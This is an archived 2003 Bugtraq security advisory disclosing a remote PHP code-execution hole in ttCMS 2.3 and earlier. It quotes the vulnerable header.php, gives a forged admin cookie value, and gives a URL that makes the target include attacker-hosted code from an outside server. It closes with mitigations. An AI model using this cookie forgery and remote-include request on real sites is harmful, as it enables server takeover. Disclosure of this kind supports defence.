lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <408.1053198124@www67.gmx.net>
Date: Sat, 17 May 2003 21:02:04 +0200 (MEST)
From: ScriptSlave@....net
To: bugtraq@...urityfocus.com
Subject: Remote code execution in ttCMS <=v2.3


Advisory name: Remote code execution in ttCMS 2.2.0/2.2.1
Application: ttCMS v2.3 (and older versions)
Vendor: www.ttcms.com
Status: Vendor was contacted but didn't reply - after posting about another
hole on his forums, my account was banned
Impact: Attacker can execute arbitrary php code 
Platform(s): Unix 

Technical description:
----------------------

Everybody can inject PHP code in ttCMS through the file "header.php"
which can be found in the directory admin/templates/

header.php:
------------------------------------------
(Line #002) if ($HTTP_COOKIE_VARS["ttcms_user_admin"] > 0) {
(Line #003)  include_once("$admin_root/templates/header.inc.php");
(Line #004) } else {
(Line #005)  header("Location: $admin_root_url/login.php");
(Line #006)  exit;
(Line #007) }
------------------------------------------

all you have to do is to send a fake cookie containing

------------------------------------------
ttcms_user_admin=1
------------------------------------------

(this can easily be done by using a tool like Proxomitron or
Anonymity4Proxy)

In order to exploit this vulnerability, you have to create a 
file "templates/header.inc.php" on your own webserver,
which contains the  code you want to execute on the target-system.

If you now call the file "header.php" like this:

------------------------------------------
http://target/admin/templates/header.php?admin_root=http://yourserver/
------------------------------------------

the code in "templates/header.inc.php" on your own webserver will be 
injected. (of course, PHP Execution must be disabled on your machine or
you must use a ftp-Server to store the file you want to inject)

Recommendations:
----------------
Run ttCMS on a secure environment.
Disable register_globals in php.ini
Update to a newer version of ttCMS (currently, none exists)

-- 
+++ GMX - Mail, Messaging & more  http://www.gmx.net +++
Bitte lächeln! Fotogalerie online mit GMX ohne eigene Homepage!

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ